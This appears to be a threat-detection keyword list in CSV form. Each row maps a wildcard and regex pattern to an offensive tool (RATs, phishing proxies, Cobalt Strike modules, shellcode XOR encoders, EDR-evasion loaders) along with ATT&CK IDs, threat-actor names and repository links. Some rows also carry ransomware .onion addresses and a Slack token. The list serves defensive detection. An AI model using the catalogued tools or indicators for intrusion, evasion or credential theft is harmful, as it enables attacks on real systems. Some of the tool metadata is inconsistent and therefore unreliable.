"*xeno rat client.exe*",".{0,1000}xeno\srat\sclient\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63204"
"*xeno rat server.exe*",".{0,1000}xeno\srat\sserver\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63205"
"*xeno%20rat%20client.exe*",".{0,1000}xeno\%20rat\%20client\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63206"
"*xeno%20rat%20server.exe*",".{0,1000}xeno\%20rat\%20server\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63207"
"*Xeno_manager.exe*",".{0,1000}Xeno_manager\.exe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63208"
"*XenoUpdateManager.lnk*",".{0,1000}XenoUpdateManager\.lnk.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","63209"
"*X-Evilginx*",".{0,1000}X\-Evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","63217"
"*xforcered/CredBandit*",".{0,1000}xforcered\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/CredBandit","1","1","N/A","N/A","10","10","240","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z","63218"
"*xforcered/Detect-Hooks*",".{0,1000}xforcered\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","N/A","10","10","100","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z","63219"
"*xforwardedfor.py*",".{0,1000}xforwardedfor\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","63220"
"*xFreed0m/RDPassSpray*",".{0,1000}xFreed0m\/RDPassSpray.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","63221"
"*xfreerdp /v*SOCtest*AllLegitHere*",".{0,1000}xfreerdp\s\/v.{0,1000}SOCtest.{0,1000}AllLegitHere.{0,1000}","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","N/A","10","7","648","244","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z","63222"
"*xfrm_poc*lucky0*",".{0,1000}xfrm_poc.{0,1000}lucky0.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","63223"
"*X-Gophish-Contact*",".{0,1000}X\-Gophish\-Contact.{0,1000}","offensive_tool_keyword","gophish","Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.","T1566 - T1598","TA0008 - TA0009","N/A","Black Basta","Phishing","https://github.com/gophish/gophish","1","0","N/A","N/A","10","10","12483","2528","2024-09-23T04:24:43Z","2013-11-18T23:26:43Z","63224"
"*Xiangshan@360RedTeam*",".{0,1000}Xiangshan\@360RedTeam.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#email","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","63225"
"*XiaoliChan/wmiexec-Pro*",".{0,1000}XiaoliChan\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","63226"
"*XiebroC2-main.zip*",".{0,1000}XiebroC2\-main\.zip.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","63227"
"*XiebroC2-v*.7z*",".{0,1000}XiebroC2\-v.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","63228"
"*xillwillx/tricky.lnk*",".{0,1000}xillwillx\/tricky\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","63229"
"*XiphosResearch*",".{0,1000}XiphosResearch.{0,1000}","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","N/A","10","1551","585","2023-10-06T19:57:20Z","2015-03-05T11:15:07Z","63230"
"*x-ishavocframework*",".{0,1000}x\-ishavocframework.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","63231"
"*xjakumydulag5z65c7kd4agbxfyajpbrj6wfanj3koyhb5asq2x4e7yd.onion*",".{0,1000}xjakumydulag5z65c7kd4agbxfyajpbrj6wfanj3koyhb5asq2x4e7yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63232"
"*xjasonlyu/tun2socks*",".{0,1000}xjasonlyu\/tun2socks.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","63233"
"*XjKVGK8ONDO9zVYwyGZBcz0pRjnm9eDj6vPpYOZqeAgr1n7aqBNgZPZolYoc=*",".{0,1000}XjKVGK8ONDO9zVYwyGZBcz0pRjnm9eDj6vPpYOZqeAgr1n7aqBNgZPZolYoc\=.{0,1000}","offensive_tool_keyword","SharpOxidResolver","search the current domain for computers and get bindings for all of them","T1018 - T1046 - T1016","TA0007","N/A","KNOTWEED","Discovery","https://github.com/S3cur3Th1sSh1t/SharpOxidResolver","1","0","#base64","N/A","9","1","50","9","2020-11-25T08:42:06Z","2020-11-25T08:23:23Z","63234"
"*xlowfznrg4wf7dli.onion*",".{0,1000}xlowfznrg4wf7dli\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63235"
"*xmendez/wfuzz*",".{0,1000}xmendez\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","63236"
"*XML-External-Entity-(XXE)-Payloads*",".{0,1000}XML\-External\-Entity\-\(XXE\)\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","63237"
"*xmr.2miners.com*",".{0,1000}xmr\.2miners\.com.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","N/A","9","","N/A","","","","63238"
"*xnsbsjciylsg23zfmrv6ocuyh7ha5zexeouchlr3zsi5suda4arpeyqd.onion*",".{0,1000}xnsbsjciylsg23zfmrv6ocuyh7ha5zexeouchlr3zsi5suda4arpeyqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63259"
"*XOR Shellcode Encoder.csproj*",".{0,1000}XOR\sShellcode\sEncoder\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","63260"
"*xor*8200ab18b1a1965f1759c891e87bc32f208843331d83195c21ee03148b531a0e*",".{0,1000}xor.{0,1000}8200ab18b1a1965f1759c891e87bc32f208843331d83195c21ee03148b531a0e.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","63261"
"*xor.exe *.txt*",".{0,1000}xor\.exe\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","63262"
"*xor.py *.dll*",".{0,1000}xor\.py\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","63263"
"*XOR_b64_encrypted*covenant.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","63264"
"*XOR_b64_encrypted*covenant2.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}covenant2\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","63265"
"*XOR_b64_encrypted*havoc.txt*",".{0,1000}XOR_b64_encrypted.{0,1000}havoc\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","63266"
"*xor_crypt_and_encode(*",".{0,1000}xor_crypt_and_encode\(.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","63267"
"*xor_encrypt(*",".{0,1000}xor_encrypt\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","63268"
"*xor_payload*",".{0,1000}xor_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","63269"
"*xor-bin.py *.exe*",".{0,1000}xor\-bin\.py\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","63270"
"*XorEncoder.py*",".{0,1000}XorEncoder\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","63271"
"*XorEncryptPayload.cpp*",".{0,1000}XorEncryptPayload\.cpp.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","63272"
"*XorEncryptPayload.exe*",".{0,1000}XorEncryptPayload\.exe.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","63273"
"*XorEncryptPayload.vcxproj*",".{0,1000}XorEncryptPayload\.vcxproj.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","1","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","63274"
"*XOR-Payloads.py*",".{0,1000}XOR\-Payloads\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","63275"
"*xoxb-2144924547920-3382587054001-2xPrUBj0D8yf0D5BNDPh3nwY*",".{0,1000}xoxb\-2144924547920\-3382587054001\-2xPrUBj0D8yf0D5BNDPh3nwY.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","slack id","10","10","N/A","N/A","N/A","N/A","63276"
